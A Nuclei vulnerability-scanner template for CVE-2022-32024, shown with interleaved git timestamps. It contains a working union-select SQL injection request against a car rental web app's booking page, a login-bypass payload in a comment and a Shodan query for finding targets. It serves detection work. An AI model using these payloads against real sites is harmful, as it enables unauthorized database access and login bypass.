nuclei-templates/cves/2022/CVE-2022-32024.yaml

46 lines
1.2 KiB
YAML
Raw Normal View History

2022-07-31 21:06:36 +00:00
id: CVE-2022-32024
info:
name: Car Rental Management System v1.0 - SQL Injection
author: arafatansari
severity: high
description: |
Car Rental Management System v1.0 is vulnerable to SQL Injection via /booking.php?car_id=.
reference:
2022-08-02 08:17:30 +00:00
- https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-4.md
- https://nvd.nist.gov/vuln/detail/CVE-2022-32024
2022-07-31 21:06:36 +00:00
metadata:
2022-08-02 08:17:30 +00:00
verified: true
2022-07-31 21:06:36 +00:00
shodan-query: http.html:"Car Rental Management System"
2022-08-02 09:26:14 +00:00
comment: Login bypass is also possible using the payload- admin'+or+'1'%3D'1' in username.
2022-08-02 08:17:30 +00:00
tags: cve,cve2022,carrental,cms,sqli,authenticated
variables:
num: "999999999"
2022-07-31 21:06:36 +00:00
requests:
- raw:
- |
2022-08-02 08:17:30 +00:00
POST /admin/ajax.php?action=login HTTP/1.1
2022-07-31 21:06:36 +00:00
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
2022-08-02 09:26:14 +00:00
2022-08-02 08:17:30 +00:00
username={{username}}&password={{password}}
- |
GET /booking.php?car_id=-1%20union%20select%201,md5({{num}}),3,4,5,6,7,8,9,10--+ HTTP/1.1
Host: {{Hostname}}
2022-07-31 21:06:36 +00:00
2022-08-02 09:26:14 +00:00
skip-variables-check: true
2022-08-02 08:17:30 +00:00
cookie-reuse: true
2022-07-31 21:06:36 +00:00
matchers-condition: and
matchers:
- type: word
part: body
words:
2022-08-02 08:17:30 +00:00
- '{{md5({{num}})}}'
2022-07-31 21:06:36 +00:00
- type: status
status:
- 200